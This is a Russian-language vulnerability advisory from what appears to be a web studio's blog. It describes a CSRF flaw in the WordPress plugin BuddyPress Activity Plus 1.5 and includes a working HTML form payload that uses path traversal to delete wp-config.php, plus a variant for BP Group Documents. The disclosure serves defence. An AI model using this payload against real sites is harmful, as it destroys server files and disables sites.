Magmalion 19.05.2016 Информационная безопасность

CSRF УЯЗВИМОСТЬ В ПЛАГИНЕ BUDDYPRESS ACTIVITY PLUS

Недавно командой наших исследователей была обнаружена необычная
CSRF-уязвимость в плагине BuddyPress. С помощью этого плагина владельцы сайта на Wordpress  могут вставлять любой медиа контент в свою ленту новостей. Необычная особенность этой уязвимости заключается в том, что единственное ее предназначение — это возможность стереть любой файл системы, к которому есть доступ у PHP процесса.
EXPLOIT
Для атаки  злоумышленнику нужно создать страницу с нужным содержимым и «заставить» авторизованного пользователя нажать на нужную ему кнопку:
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php">
<input type="text" name="action" value="bpfb_remove_temp_images">
<input type="text" name="data"
value="bpfb_photos[]=../../../../wp-config.php">
<input type="submit">
</form>
Далее размеры атаки будут  обуславливаться полномочиями и правами PHP-пользователя на сервере. Подобная  атака возможна, если в системе присутствует плагин BP Group Documents.
Для этого следует изменить bpfb_remove_temp_images на bpfb_remove_temp_
documents и bpfb_photos на bpfb_documents.
Угроза версии:
BuddyPress Activity Plus 1.5
Решение:
Выпущено для наших клиентов

Возврат к списку

Hide popup
Заказать обратный звонок
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Заказать мобильное приложение
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Заказать защиту сайта
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Заказать сайт
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Продвинуть сайт
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Создание групп в социальных сетях
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Контекстная реклама
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Аналитика и аудит
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Ведение групп в социальных сетях
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Таргетированная реклама в соцсетях
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Репутационный маркетинг
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
А/В тестирование
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Настройка счетчика для сайта
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Usability-аудит
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Комплексная веб-аналитика
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Репутационный маркетинг
Отправить
Спасибо!Ваша заявка отправлена.Мы с Вами скоро свяжемся.
Hide popup
Брянск Москва